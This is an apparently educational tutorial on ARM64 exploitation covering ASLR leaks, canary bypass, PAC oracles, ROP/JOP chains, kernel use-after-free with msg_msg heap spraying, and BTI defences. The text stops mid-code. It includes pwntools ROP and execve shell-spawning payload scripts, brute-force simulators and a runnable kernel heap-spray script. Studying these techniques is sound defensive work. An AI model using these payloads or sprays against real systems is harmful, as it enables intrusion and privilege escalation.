
ARM Assembly Part 27: Security Research & Exploitation on ARM64

July 2, 2026 Wasil Zafar 25 min read

ASLR bypass, PAC oracle attacks, ROP/JOP chain construction on AArch64, kernel exploitation patterns, and hardware defences BTI and CFI.

Table of Contents

  1. ASLR on ARM64
  2. Stack Canaries
  3. PAC Bypass
  4. ROP on AArch64
  5. JOP Chains
  6. Kernel Exploitation
  7. Hardware Defences
  8. Case Study: ARM64 Exploitation
  9. Hands-On Exercises
  10. Summary

Security research on ARM64 blends intimate knowledge of the ISA with an understanding of OS memory layout, compiler mitigations, and hardware defences. This part covers the attack path from memory disclosure through ROP/JOP chain execution, examines kernel exploitation patterns specific to AArch64, and closes with the hardware control-flow integrity mechanisms — BTI and PAC — that are shifting the exploit landscape.

Educational purpose only. All techniques described here are presented for defensive understanding and security research in controlled, authorised environments. Applying exploitation techniques to systems you do not own or have explicit permission to test is illegal.
Analogy — Breaking into a Fortress: Think of an ARM64 process as a medieval fortress with layered defences. ASLR is like randomising the location of the castle every time you look away — you can't aim siege weapons if you don't know where the walls are. An information leak is a scout spy who reports back the castle's coordinates. Stack canaries are tripwires at every doorway — step on one and the alarm sounds. PAC is like a wax seal on every message: forge the seal and the message is accepted; break it and the guards attack. ROP chains are like Trojan horses — you don't bring your own army; you commandeer the castle's own soldiers (existing code gadgets) and issue commands they already know how to execute, just in an order the defenders never intended. BTI adds checkpoint gates that only allow soldiers arriving from approved routes. MTE is like colour-coding every room key — use a red key on a blue lock and it jams, even if the physical shape is correct.

ASLR on ARM64

KASLR & User-Space ASLR

AArch64 typically uses 48-bit virtual addresses (52-bit on implementations with FEAT_LVA). The OS randomises load addresses at multiple levels:

ASLR
ARM64 ASLR entropy sources (Linux)
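| Target | Sysctl / flag | Bits of entropy |
|---|---|---|
| User stack | randomize_va_space (the stack offset is separate from mmap_rnd_bits) | about 18 bits, page-granular with 4 KB pages |
| mmap regions | mmap_rnd_bits | 18 to 33 bits with 4 KB pages and 48-bit VA; upstream default 18, often raised by distributions |
| PIE executable | mmap_rnd_bits | same as mmap regions |
| Kernel text (KASLR) | nokaslr to disable | ~21 bits (2 MB aligned) |
| Kernel modules | independent slot | ~18 bits |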
# Check ASLR configuration on Linux ARM64
cat /proc/sys/kernel/randomize_va_space   # 2 = full ASLR

# Check kernel KASLR state (requires root)
cat /proc/kallsyms | grep " T _text"      # text base changes on each boot
# With kptr_restrict=2, all shown as 0 — information leak barrier

# Disable ASLR for a single process (development/research only)
setarch aarch64 -R ./target_binary        # -R = ADDR_NO_RANDOMIZE

# Build a PIE binary (default with modern GCC/Clang)
aarch64-linux-gnu-gcc -pie -fPIE -o pie_target main.c

# Build non-PIE (known load address 0x400000) — for controlled experiments
aarch64-linux-gnu-gcc -no-pie -fno-PIE -o nopie_target main.c
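
To make entropy figures concrete, the sketch below converts a number of random bits into the count of possible base addresses and the address span they cover. It assumes page-granular randomisation with 4 KB pages; the helper name `aslr_span` and the sample bit counts are illustrative, not taken from any tool.

```python
def aslr_span(rnd_bits: int, page_size: int = 4096) -> tuple[int, int]:
    """Return (number of possible bases, bytes spanned) for page-granular ASLR."""
    slots = 1 << rnd_bits
    return slots, slots * page_size


# Sample values only: check the real setting in /proc/sys/vm/mmap_rnd_bits.
for bits in (18, 28, 33):
    slots, span = aslr_span(bits)
    print(f"{bits} bits: {slots} possible bases across {span // 2**30} GiB")
```

A blind guess succeeds with probability 1/slots per attempt, which is why attackers look for a leak rather than guessing.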

Information Leaks — Breaking ASLR

ASLR is defeated when an attacker can read a pointer that reveals a randomised address. Common leak primitives on ARM64:

Leak vectors
Common pointer leak classes
  • Format string: printf(user_input) with %p specifiers in the input leaks stack/heap pointers directly.
  • Stack over-read: a write() or send() that returns more bytes than the program initialised; the uninitialised stack bytes contain saved return addresses or pointers into libc.
  • Use-After-Free heap read: reading freed memory whose allocator slot was refilled with a struct containing kernel/libc pointers.
  • /proc info: /proc/self/maps lists the process's exact mappings to anyone who can read that file (for example through a file-disclosure bug); /proc/kallsyms can reveal kernel addresses when kptr_restrict=0.
  • Side-channel: cache-timing (Flush+Reload, Prime+Probe) or branch predictor oracles to infer randomised addresses when pointer values are inaccessible directly.
// Typical stack over-read leak pattern (educational excerpt)
// Vulnerable function: sends a fixed number of bytes regardless of input length
// Assumed stack layout, low → high address. It varies by compiler and options:
// GCC usually puts a function's own frame record below its locals, so the
// record above local_buf may belong to the caller.
//   [local_buf 64 bytes] [saved x29 (frame ptr)] [saved x30 (LR)] ...
// If we can read 80 bytes starting at local_buf, the last 8 are a saved x30
// (a return address, here assumed to point into libc)

// Computing libc base from a leak:
// leaked_addr = u64(read_bytes[0x48:0x50])  (little-endian; 64-byte buffer + 8-byte x29)
// libc_base   = leaked_addr - known_offset_of_leaked_symbol_in_libc
// system_addr = libc_base  + offset_of_system_in_libc

// Find symbol offsets with:
//   aarch64-linux-gnu-readelf -s /lib/aarch64-linux-gnu/libc.so.6 | grep " system"
//   aarch64-linux-gnu-nm -D /lib/aarch64-linux-gnu/libc.so.6 | grep __libc_start_main
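
The arithmetic in the comments above can be sketched in a few lines of Python. This is a minimal illustration on synthetic data: the base address, the return-site offset `0x27400`, and the helper name `libc_base_from_leak` are all hypothetical, and 4 KB pages are assumed for the alignment sanity check.

```python
import struct

PAGE_MASK = 0xFFF  # libc is mapped at a page-aligned base (4 KB pages assumed)


def libc_base_from_leak(leak: bytes, slot_offset: int, symbol_offset: int) -> int:
    """Recover the libc base from an over-read buffer.

    leak          -- raw bytes returned by the over-read
    slot_offset   -- where the saved x30 sits inside `leak`
    symbol_offset -- offset inside libc of the address that x30 points to
    """
    (leaked_addr,) = struct.unpack_from("<Q", leak, slot_offset)  # little-endian u64
    base = leaked_addr - symbol_offset
    if base & PAGE_MASK:
        raise ValueError(f"base {base:#x} is not page-aligned; wrong offset?")
    return base


# Synthetic demo: 64-byte buffer, saved x29, then saved x30 at offset 0x48.
fake_base = 0x7F8A000000
ret_site_offset = 0x27400  # hypothetical return site inside libc
leak = b"A" * 64 + struct.pack("<QQ", 0x7FFFFFFFE000, fake_base + ret_site_offset)

base = libc_base_from_leak(leak, 0x48, ret_site_offset)
print(hex(base))
```

The page-alignment check is a cheap way to catch a wrong libc version or a wrong symbol offset before building a chain on top of a bad base.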

Stack Canaries on AArch64

GCC/Clang insert a stack canary between local buffers and the saved registers that an overflow would reach. With glibc on AArch64 the reference value lives in the global __stack_chk_guard (unlike x86-64, which reads it from TLS); the Linux kernel can use a per-task guard via -mstack-protector-guard=sysreg. A linear stack overflow that reaches a saved LR must first corrupt the canary, which is checked before the function returns.

; Compiler-generated canary prologue/epilogue (AArch64, GCC -fstack-protector-strong)
; Representative output for glibc targets; registers and stack offsets vary.
; Prologue, after the regular save of x29/x30:
    adrp    x0, :got:__stack_chk_guard
    ldr     x0, [x0, #:got_lo12:__stack_chk_guard]  ; x0 = &__stack_chk_guard
    ldr     x1, [x0]               ; load the reference canary
    str     x1, [sp, #40]          ; place a copy above the local buffers
    mov     x1, #0                 ; zero x1 so the canary isn't left in a register

; ... function body ...

; Epilogue, before restoring x29/x30:
    adrp    x0, :got:__stack_chk_guard
    ldr     x0, [x0, #:got_lo12:__stack_chk_guard]
    ldr     x2, [sp, #40]          ; reload the stack copy
    ldr     x1, [x0]               ; load the reference canary again
    subs    x2, x2, x1             ; difference should be zero
    mov     x1, #0
    b.eq    1f                     ; match → normal return path
    bl      __stack_chk_fail       ; mismatch → abort()
1:

Bypass Techniques

Bypass
Canary bypass strategies
  • Leak then overwrite: Use an information leak to read the canary value from the stack or TLS, then include it verbatim in the overflow payload. Requires a separate read primitive before writing.
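  • Partial overwrite: a linear overflow cannot reach the saved LR without crossing the canary, so this applies to non-linear writes (an attacker-controlled index or offset) that skip over it. Patching only the low bytes of the 8-byte saved LR redirects execution within the same module without knowing the randomised high bytes; the reachable targets are limited by alignment and by which bytes the bug lets you write.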
  • Canary brute-force: Only practical against forked servers (fork() preserves canary across child copies). The 8-byte canary can be brute-forced byte-by-byte — 256 attempts per byte × 7 non-null bytes = 1,792 max attempts.
  • Function pointer overwrite: If a function pointer lives before the canary on the stack (or on the heap), overwrite it instead to achieve control flow without touching the canary.
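
The byte-by-byte brute-force strategy can be illustrated with a small simulation. Nothing here touches a real process: `make_oracle` is a hypothetical stand-in for a forking server whose child survives only when the overwritten canary bytes match, and the 8-byte canary with a zero low byte follows the description above.

```python
import os


def make_oracle(canary: bytes):
    """Simulate a forking server: a child survives only if every overwritten
    canary byte matches. state['calls'] counts the children spawned."""
    state = {"calls": 0}

    def survives(prefix: bytes) -> bool:
        state["calls"] += 1
        return canary[: len(prefix)] == prefix

    return survives, state


def brute_force_canary(survives, length: int = 8) -> bytes:
    known = b"\x00"  # the low byte is assumed to be zero, as in glibc
    while len(known) < length:
        for guess in range(256):
            if survives(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("no guess survived; did the canary change?")
    return known


secret = b"\x00" + os.urandom(7)
survives, state = make_oracle(secret)
recovered = brute_force_canary(survives)
print(recovered == secret, state["calls"])
```

Because each byte is confirmed independently, the cost grows linearly with the canary length (at most 7 × 256 attempts) instead of exponentially.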

Pointer Authentication Code Bypass

PAC (Pointer Authentication Codes, ARMv8.3+) signs pointers with a cryptographic MAC stored in the unused upper bits. Apple's ARM64e ABI mandates PAC for all return addresses; Linux supports it through CONFIG_ARM64_PTR_AUTH, with per-process key control via prctl(PR_PAC_SET_ENABLED_KEYS). Bypassing PAC is an active research area.

PAC key types: IA/IB (instruction pointers), DA/DB (data pointers), GA (generic). The kernel uses IA key for return addresses. The key material is stored in system registers APIAKeyLo_EL1/APIAKeyHi_EL1 — not directly readable from EL0.
; PAC sign/authenticate instructions
PACIASP             ; sign the return address: LR = PAC(LR, modifier = SP, IA key)
AUTIASP             ; authenticate: on failure the upper bits of LR are corrupted so the
                    ; following RET faults (with FEAT_FPAC, AUTIASP itself faults)
RET                 ; plain RET branches to LR without authenticating
RETAA               ; combined form: authenticate LR with the IA key, then return

; PAC stripping
XPACLRI             ; strip the PAC from LR without checking it; a HINT-space
                    ; instruction usable at EL0 (debuggers and unwinders rely on it)

; PACIB vs PACIA: two separate instruction keys (IA and IB) let different
; software layers sign with different keys
PACIBSP             ; sign with the IB key (Linux kernel uses IA; Apple's arm64e ABI
                    ; signs return addresses with IB)
AUTIBSP
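
How many bits the PAC actually occupies depends on the address-space configuration. The sketch below models the usual layout, in which the PAC fills bits [54:va_bits] plus the top byte when top-byte-ignore (TBI) is off, and bit 55 selects the user or kernel half. The function names are illustrative, and `strip_pac` is a simplified model of XPAC that ignores TBI tags.

```python
def pac_field_bits(va_bits: int, tbi: bool) -> int:
    """Width of the PAC field: bits [54:va_bits], plus [63:56] when TBI is off."""
    return (55 - va_bits) + (0 if tbi else 8)


def strip_pac(ptr: int, va_bits: int) -> int:
    """Model XPAC (no TBI tag): refill the extension bits with copies of bit 55."""
    low_mask = (1 << va_bits) - 1
    low = ptr & low_mask
    if (ptr >> 55) & 1:                       # kernel-half pointer: extend with ones
        return low | (((1 << 64) - 1) ^ low_mask)
    return low                                # user-half pointer: extend with zeros


for va, tbi in ((48, True), (48, False), (39, True), (39, False)):
    print(f"VA={va} TBI={tbi}: {pac_field_bits(va, tbi)} PAC bits")

print(hex(strip_pac(0x002B7F8A00001234, 48)))
print(hex(strip_pac(0xFFAB800010000000, 48)))
```

The width matters for brute-force estimates: a 7-bit PAC gives 128 candidates, while a 24-bit PAC gives roughly 16.7 million.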

PAC Oracle Attack Pattern

PAC research
Oracle-based PAC bypass (conceptual)

A PAC oracle arises when an attacker can call AUTIA (authenticate) on a chosen pointer and observe whether it fault-traps or succeeds — distinguishing valid from invalid PAC values. With enough oracle queries the valid PAC for a given pointer+context can be deduced. Attack steps:

  1. Obtain a code-execution primitive (e.g., a heap overflow into a vtable pointer that has not yet been signed).
  2. Use a JIT engine or mmap+mprotect(PROT_EXEC) to place code containing AUTIA x0, x1; RET.
  3. Invoke the gadget with the target pointer and candidate PAC values; fault vs success reveals if the PAC was correct.
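  4. The search space is 2^n for an n-bit PAC field, where n depends on the virtual address size and on whether top-byte-ignore is enabled. With a 16-bit field, at most 65,536 queries suffice, which is feasible in a JIT-heavy context like Safari's JavaScriptCore where thousands of oracle calls per second are possible.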

Mitigations: Apple A15+ uses full 24-bit PAC fields; iOS crash reporting limits crash-loop rate; jscBuiltin functions restricted to internal contexts.
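
The oracle loop in steps 3 and 4 can be sketched as a toy model. This is not how hardware computes a PAC: a truncated HMAC-SHA256 stands in for the real cipher, the PAC is assumed to occupy bits [63:48], and a failed check simply returns False instead of crashing. `ToyPac` and `brute_force_pac` are hypothetical names.

```python
import hashlib
import hmac
import os

PAC_BITS = 16
PAC_SHIFT = 48                      # simplification: PAC occupies bits [63:48]
ADDR_MASK = (1 << PAC_SHIFT) - 1


class ToyPac:
    """Stand-in for PACIA/AUTIA with a secret key the attacker cannot read."""

    def __init__(self):
        self._key = os.urandom(16)  # plays the role of the APIAKey registers
        self.auth_calls = 0

    def _mac(self, addr: int, context: int) -> int:
        msg = addr.to_bytes(8, "little") + context.to_bytes(8, "little")
        digest = hmac.new(self._key, msg, hashlib.sha256).digest()
        return int.from_bytes(digest[:2], "little")   # truncate to 16 bits

    def sign(self, addr: int, context: int) -> int:
        return (self._mac(addr & ADDR_MASK, context) << PAC_SHIFT) | (addr & ADDR_MASK)

    def authenticate(self, signed: int, context: int) -> bool:
        self.auth_calls += 1
        return (signed >> PAC_SHIFT) == self._mac(signed & ADDR_MASK, context)


def brute_force_pac(oracle: ToyPac, addr: int, context: int) -> int:
    """Try every PAC value until the oracle accepts one."""
    for candidate in range(1 << PAC_BITS):
        forged = (candidate << PAC_SHIFT) | addr
        if oracle.authenticate(forged, context):
            return forged
    raise RuntimeError("no PAC value accepted")


oracle = ToyPac()
target, ctx = 0x7F8A0004F8C0, 0x7FFFFFFFE000   # placeholder pointer and modifier
forged = brute_force_pac(oracle, target, ctx)
print(hex(forged), oracle.auth_calls)
```

On real hardware each wrong guess normally faults, so a practical oracle needs a way to observe the result without a fatal crash; that requirement is what rate-limiting mitigations target.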

Return-Oriented Programming on AArch64

ROP on AArch64 differs from x86-64 in one crucial way: BL places the return address in the link register (x30/LR), not on the stack, and RET branches to x30 rather than popping an address. However, every non-leaf function spills LR to the stack in its prologue and reloads it before RET, so AArch64 ROP looks very similar to x86-64 once we understand the gadget landscape.

Gadget Anatomy on AArch64

# Find ROP gadgets using Ropper (ARM64/AArch64 mode)
pip install ropper
ropper --file /lib/aarch64-linux-gnu/libc.so.6 --arch ARM64 --search "ret"

# Find specific useful gadgets
ropper --file /lib/aarch64-linux-gnu/libc.so.6 --arch ARM64 \
       --search "ldp x0, x1, [sp,?]; ret"

ropper --file /lib/aarch64-linux-gnu/libc.so.6 --arch ARM64 \
       --search "mov x0, x1; ret"

# ROPgadget (alternative tool; the architecture is detected from the ELF header)
ROPgadget --binary /lib/aarch64-linux-gnu/libc.so.6 \
          --nojop --nosys | grep "ret$"

# pwntools disassembly verification
python3 -c "
from pwn import *
context.arch = 'aarch64'
# Verify a gadget at a known offset
gadget_bytes = b'\xe0\x03\x01\xaa\xc0\x03\x5f\xd6'   # mov x0,x1; ret
print(disasm(gadget_bytes))
"
Gadget types
Essential AArch64 ROP gadget categories
| Purpose | Gadget pattern | Notes |
|---|---|---|
| Load x0 (arg1) | ldr x0, [sp, #N]; ret | Set function first argument |
| Load x1 (arg2) | ldr x1, [sp, #N]; ret | Set function second argument |
| Load x2 (arg3) | ldr x2, [sp, #N]; ret | Third argument for syscalls |
| Load multiple | ldp x0, x1, [sp]; ret | Efficient two-arg setup |
| Stack pivot | mov sp, x0; ret | Move fake stack; critical |
| Write primitive | str x0, [x1]; ret | Arbitrary write via two gadgets |
| Syscall | svc #0; ret | x8=NR, x0-x5=args |
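
Because every A64 instruction is a 4-byte little-endian word, a first-pass gadget search is just a scan for the `ret` encoding at 4-byte alignment. The sketch below shows the idea with the standard library only; `find_ret_gadgets` is an illustrative helper, far simpler than what Ropper or ROPgadget do (it does not disassemble or filter out sequences that contain other branches).

```python
import struct

RET = 0xD65F03C0  # encoding of `ret` (branch to x30)


def find_ret_gadgets(code: bytes, base: int = 0, max_insns: int = 3):
    """Yield (address, words) for each run of up to max_insns words ending in RET."""
    count = len(code) // 4
    words = struct.unpack(f"<{count}I", code[: count * 4])
    for i, word in enumerate(words):
        if word != RET:
            continue
        for n in range(1, max_insns + 1):
            start = i - n + 1
            if start < 0:
                break
            yield base + 4 * start, words[start : i + 1]


code = bytes.fromhex("e00301aa" "c0035fd6")   # mov x0, x1 ; ret
gadgets = list(find_ret_gadgets(code, base=0x1000))
for addr, insns in gadgets:
    print(hex(addr), [f"{w:08x}" for w in insns])
```

Fixed-width instructions mean there are no unintended gadgets at misaligned offsets, unlike on x86-64.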

Building an AArch64 ROP Chain

#!/usr/bin/env python3
# AArch64 ROP chain construction with pwntools (educational example)
# Target: call system("/bin/sh") via ROP after stack buffer overflow
# Assumes: ASLR defeated (libc base known), stack canary defeated (leaked)

from pwn import *
context.arch    = 'aarch64'
context.log_level = 'info'

# Offsets from libc base. Placeholder values; find real ones with:
#   nm -D libc.so.6 | grep " system"
#   strings -a -t x libc.so.6 | grep "/bin/sh"
LIBC_BASE    = 0x7f8a000000     # leaked at runtime
system_off   = 0x0004f8c0       # offset of system() in libc
binsh_off    = 0x001725a0       # offset of "/bin/sh" string in libc

# Gadget offset from libc base (found with ropper; hypothetical here)
# gadget: ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret
# RET branches to x30 without popping, so the gadget itself must reload x30.
pop_x0_off   = 0x0006ab3c

system_addr  = LIBC_BASE + system_off
binsh_addr   = LIBC_BASE + binsh_off
pop_x0       = LIBC_BASE + pop_x0_off

# Stack overflow: overwrite saved x29, x30
# Assumed layout (low → high address); after the victim's epilogue, sp points
# just past the overwritten frame record:
#   [local_buffer 64 bytes]
#   [saved x29 (8 bytes)]
#   [saved x30 = return address (8 bytes)]
padding  = b'A' * 64
saved_x29 = p64(0x4141414141414141)   # fake frame pointer (benign)
rop_chain = (
    padding
    + saved_x29
    + p64(pop_x0)              # overwrite saved LR → gadget
    # Frame consumed by the gadget (sp points here when it runs):
    + p64(0x4242424242424242)  # sp+0x00 → x29 (junk)
    + p64(system_addr)         # sp+0x08 → x30, so the gadget's ret enters system()
    + p64(0)                   # sp+0x10   unused slot
    + p64(binsh_addr)          # sp+0x18 → x0 = pointer to "/bin/sh"
)
print(hexdump(rop_chain))
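
One detail that trips up people coming from x86-64 is that `ret` on AArch64 does not pop anything: it branches to whatever x30 holds, so a usable gadget has to reload x30 from attacker-controlled stack memory. The sketch below models a hypothetical gadget, `ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret`, in plain Python to show which stack slots end up in which registers. The addresses are placeholders.

```python
import struct


def run_gadget(stack: bytes, sp: int) -> dict:
    """Model `ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret`."""
    def u64(off: int) -> int:
        return struct.unpack_from("<Q", stack, sp + off)[0]

    regs = {"x0": u64(0x18), "x29": u64(0x00), "x30": u64(0x08)}
    regs["sp"] = sp + 0x20       # post-index writeback of the ldp
    regs["pc"] = regs["x30"]     # ret branches to x30; nothing is popped
    return regs


SYSTEM, BINSH = 0x7F8A04F8C0, 0x7F8A1725A0   # placeholder addresses
frame = struct.pack("<4Q", 0x4242424242424242, SYSTEM, 0, BINSH)

regs = run_gadget(frame, sp=0)
print({name: hex(value) for name, value in regs.items()})
```

After the gadget runs, pc holds the system() placeholder and x0 the string pointer, while sp has advanced by 0x20 and therefore stays 16-byte aligned.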

ret2libc — Call Convention on AArch64

AArch64 passes arguments in x0–x7. A ret2libc attack must populate these registers via gadgets before the pivot to system() or execve().

#!/usr/bin/env python3
# execve("/bin/sh", NULL, NULL) syscall chain on AArch64
# x0 = ptr to "/bin/sh",  x1 = NULL (argv),  x2 = NULL (envp),  x8 = 221 (__NR_execve)
from pwn import *
context.arch = 'aarch64'

LIBC_BASE  = 0x7fab200000
binsh_addr = LIBC_BASE + 0x001725a0

# Gadgets (placeholder offsets; locate real ones with ropper/ROPgadget)
# g1: ldp x0, x1, [sp]; ldr x2, [sp, #0x10]; ldr x8, [sp, #0x18];
#     ldp x29, x30, [sp, #0x20]; add sp, sp, #0x30; ret
# (hypothetical multi-load gadget for demonstration; it reloads x30 because
#  RET does not pop a return address from the stack)
g1         = LIBC_BASE + 0x000abcd0   # instruction addresses are 4-byte aligned
svc_ret    = LIBC_BASE + 0x000f1234   # svc #0; ret

# Stack frame layout for gadget g1:
# sp+0x00: x0  = binsh_addr
# sp+0x08: x1  = 0 (NULL argv)
# sp+0x10: x2  = 0 (NULL envp)
# sp+0x18: x8  = 221 (__NR_execve on arm64)
# sp+0x20: x29 = junk
# sp+0x28: x30 = svc_ret (where g1's ret lands)
frame = flat({
    0x00: binsh_addr,
    0x08: 0,
    0x10: 0,
    0x18: 221,
    0x20: 0x4242424242424242,
    0x28: svc_ret,
})
payload = b'A'*64 + b'B'*8 + p64(g1) + frame
print(f"Payload length: {len(payload)} bytes")

Jump-Oriented Programming (JOP)

JOP replaces the RET-based control flow of ROP with indirect branches (BR X0, BLR X0). It is used when RET instructions are filtered or when return addresses are protected (PAC-signed LR, shadow call stack) while indirect branch targets remain under attacker control.

; JOP dispatcher gadget pattern (found in device driver or JIT code)
; A "dispatch" gadget loads the next gadget address and jumps to it
; Control remains with the attacker-controlled sequence of indirect branches.

; ---- Dispatcher gadget ----
; ldr x0, [x20], #8    ; load next gadget pointer from x20 (fake stack), advance
; br  x0               ; jump to it — NOT a RET

; ---- Function gadget example ----
; mov x0, x1           ; set argument
; br  x8               ; transfer to dispatcher (x8 = dispatcher address, fixed)

; Attacker controls x20 (fake dispatch table in writable memory):
; [addr_of_gadget_A]
; [addr_of_gadget_B]
; [addr_of_gadget_C — system()]
; ...

; The dispatcher advances through the table, calling each gadget with br x0,
; each gadget ends with br x8 to return to dispatcher.

; Key difference from ROP: no RET instruction used → avoids RET-based CFI.
BTI impact on JOP: Branch Target Identification (ARMv8.5) marks valid indirect branch targets with a BTI instruction as their first instruction. In a guarded page, a BR X0 that lands on any other instruction faults. JOP gadgets in BTI-protected code must therefore begin with BTI J (jump) or BTI JC (jump+call); a BR through x16 or x17 may also land on BTI C. This dramatically reduces the useful JOP gadget surface in BTI-hardened binaries.
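
The dispatcher loop and the effect of BTI on it can be modelled in a few lines. This is a conceptual sketch only: gadget addresses and contents are made up, and `landing_pads` is a hypothetical stand-in for "the instruction at this address is BTI J or BTI JC".

```python
def run_jop(dispatch_table, gadgets, landing_pads=None):
    """Walk a fake dispatch table the way `ldr x0, [x20], #8; br x0` would.

    gadgets      -- maps address -> description (stand-in for real code)
    landing_pads -- addresses that begin with BTI J/JC; None means BTI is off
    """
    trace = []
    for target in dispatch_table:                 # x20 advances by 8 each round
        if landing_pads is not None and target not in landing_pads:
            trace.append(f"fault@{target:#x}")    # Branch Target exception
            break
        trace.append(gadgets[target])             # gadget runs, then `br x8`
    return trace


gadgets = {0x1000: "mov x0, x1", 0x2004: "ldr x1, [x0]", 0x3000: "system"}
table = [0x1000, 0x2004, 0x3000]

print(run_jop(table, gadgets))
print(run_jop(table, gadgets, landing_pads={0x1000, 0x3000}))
```

With BTI off the whole table executes; with BTI on, the chain dies at the first mid-function gadget, which is why only gadgets that start at a landing pad remain usable.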

Kernel Exploitation Patterns on ARM64

Use-After-Free via the Slab Allocator

UAF
Kernel UAF exploitation steps (ARM64 Linux)
  1. Trigger allocation: Call a kernel API (e.g., open(), socket(), perf_event_open()) that allocates a kernel-controlled struct via kmalloc().
  2. Free without clearing reference: Exploit a refcount bug or double-free to return the slab object to the allocator while a dangling pointer remains in a stale data structure.
  3. Reallocate with attacker-controlled data: Fill the freed slot via a different allocator path, often msg_msg (System V message queues, size-flexible) or pipe_buffer, both of which accept partially attacker-controlled data.
  4. Corrupt function pointer or cred struct: If the original struct contained a function pointer (e.g., file_operations, sock_ops), overwrite it to redirect execution. Alternatively, overwrite a task_struct→cred pointer to escalate privileges.
  5. Trigger UAF dispatch: Invoke the original operation (e.g., read(), ioctl()) which dereferences the now-corrupted slab object.
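# Heap spray via msg_msg (Linux, arbitrary kernel object size control)
# The msg_msg header is 48 bytes; data immediately follows.
# Allocate many System V message queue entries to fill freed slots.

python3 - <<'EOF'
import ctypes, struct

libc        = ctypes.CDLL(None, use_errno=True)
IPC_PRIVATE = 0          # always create a fresh queue
IPC_CREAT   = 0o1000
IPC_NOWAIT  = 0o4000
# 20 queues x 10 messages = 200 objects; each queue stays well under the
# default 16 KB per-queue byte limit (MSGMNB), so msgsnd never blocks.
N_QUEUES, MSGS_PER_QUEUE = 20, 10

# 200-byte body + 48-byte header = 248 bytes → lands in a 256-byte slab cache
msg_payload = b'\x41' * 200
buf = struct.pack("l", 1) + msg_payload   # struct msgbuf: long mtype; char mtext[]

queues = []
for _ in range(N_QUEUES):
    qid = libc.msgget(IPC_PRIVATE, IPC_CREAT | 0o666)
    if qid < 0:
        raise OSError(ctypes.get_errno(), "msgget failed")
    queues.append(qid)
    for _ in range(MSGS_PER_QUEUE):
        # IPC_NOWAIT: fail instead of blocking if the queue is full
        if libc.msgsnd(qid, buf, ctypes.c_size_t(len(msg_payload)), IPC_NOWAIT) < 0:
            raise OSError(ctypes.get_errno(), "msgsnd failed")

print(f"[+] Sprayed {N_QUEUES * MSGS_PER_QUEUE} msg_msg objects across {len(queues)} queues")
EOF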

Heap Spray Strategies

Spray objects
Commonly used kernel spray objects (Linux arm64)
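| Object | Syscall | Size range | Contents |
|---|---|---|---|
| msg_msg | msgsnd() | 48 B header plus body, up to one page per segment | Attacker-controlled message body |
| pipe_buffer | pipe() | 40 B each, allocated as an array of 16 (640 B) by default | Has pipe_buf_operations function ptr |
| timerfd_ctx | timerfd_create() | 216 B | Holds a wait_queue_head |
| sk_buff | sendmsg() / sendto() | Variable | Network data; widely used for large sprays |
| bpf_map | bpf(BPF_MAP_CREATE) | Variable | eBPF map; size precisely controllable |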
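
Choosing a spray object comes down to matching the slab size class of the freed victim object. The sketch below rounds an allocation size up to a size class and works out the msg_msg body length for a target cache. The size-class list is an assumption (a common general-purpose set; real kernels differ by version and configuration, and arm64 builds have historically used a larger minimum object size), and both helper names are hypothetical.

```python
import bisect

# Assumed general-purpose size classes; verify against /proc/slabinfo on the target.
KMALLOC_SIZES = [8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192]
MSG_MSG_HEADER = 48   # header size quoted above for struct msg_msg


def kmalloc_cache(size: int) -> int:
    """Round an allocation size up to the smallest size class that fits it."""
    idx = bisect.bisect_left(KMALLOC_SIZES, size)
    if idx == len(KMALLOC_SIZES):
        raise ValueError("larger than the biggest size class in this model")
    return KMALLOC_SIZES[idx]


def msg_body_for_cache(target: int) -> int:
    """Largest message body whose msg_msg still lands in the `target` class."""
    return target - MSG_MSG_HEADER


print(kmalloc_cache(MSG_MSG_HEADER + 200))   # the 200-byte body used in the spray
print(msg_body_for_cache(256))
```

For a victim object in the 256-byte class, any body between 145 and 208 bytes would place the msg_msg in the same class under this model.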

Hardware Defences — BTI and CFI

Branch Target Identification (BTI)

BTI is a hardware mechanism introduced in ARMv8.5 that restricts which addresses indirect branches (BR, BLR, BLRAAZ, etc.) may jump to. Valid targets must begin with a BTI landing pad instruction. Branching to any other instruction in a guarded page (one whose page table entry has the GP bit set) raises a Branch Target exception, which Linux delivers to the process as SIGILL.

; BTI landing pad variants
BTI C       ; valid target for BLR (call), and for BR via x16/x17
BTI J       ; valid target for BR (jump), not for BLR
BTI JC      ; valid target for both BR and BLR

; Compiler-generated function entry with BTI (clang -mbranch-protection=bti)
    .global my_function
    .type   my_function, %function
my_function:
    BTI C                    ; landing pad — accepts BLR my_function
    stp     x29, x30, [sp, #-16]!
    ; ... function body ...
    ldp     x29, x30, [sp], #16
    ret                      ; return targets are not checked by BTI

; PACIASP + BTI combo (most common in production: -mbranch-protection=standard)
my_function2:
    PACIASP                  ; also acts as an implicit BTI C landing pad
    stp     x29, x30, [sp, #-16]!
    ; ...
    ldp     x29, x30, [sp], #16
    AUTIASP
    RET
# Enable BTI in a Linux ELF binary
# -mbranch-protection=standard enables PAC (pac-ret) + BTI
clang --target=aarch64-linux-gnu \
      -mbranch-protection=standard \
      -march=armv8.5-a \
      -O2 -o btimain main.c

# Verify BTI note in ELF (GNU property)
readelf -n btimain | grep -A2 "NT_GNU_PROPERTY_TYPE_0"
# Should show: AArch64 feature: BTI, PAC

# Check whether the kernel maps the process's code as BTI-guarded
# (userspace BTI needs CONFIG_ARM64_BTI, Linux 5.8+, and BTI-capable hardware)
grep VmFlags /proc/$(pidof btimain)/smaps | grep -w bt
# Guarded mappings carry the "bt" flag in VmFlags
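
The landing-pad rules can be summarised as a small compatibility table. The model below assumes the branch executes from a guarded page and treats PACIASP as equivalent to BTI C (the architecture lets system software relax that). The function names and the `ACCEPTS` table are illustrative, not an API.

```python
def btype(branch: str, reg: str) -> str:
    """Classify an indirect branch roughly the way PSTATE.BTYPE does."""
    if branch == "blr":
        return "call"
    if branch == "br":
        return "jump_x16_x17" if reg in ("x16", "x17") else "jump"
    raise ValueError("only br/blr are modelled")


# Which branch classes each landing pad accepts.
ACCEPTS = {
    "bti c":   {"call", "jump_x16_x17"},
    "bti j":   {"jump", "jump_x16_x17"},
    "bti jc":  {"call", "jump", "jump_x16_x17"},
    "paciasp": {"call", "jump_x16_x17"},   # implicit BTI C landing pad
}


def bti_allows(branch: str, reg: str, first_insn: str) -> bool:
    """True if the branch may land on a target whose first instruction is first_insn."""
    return btype(branch, reg) in ACCEPTS.get(first_insn, set())


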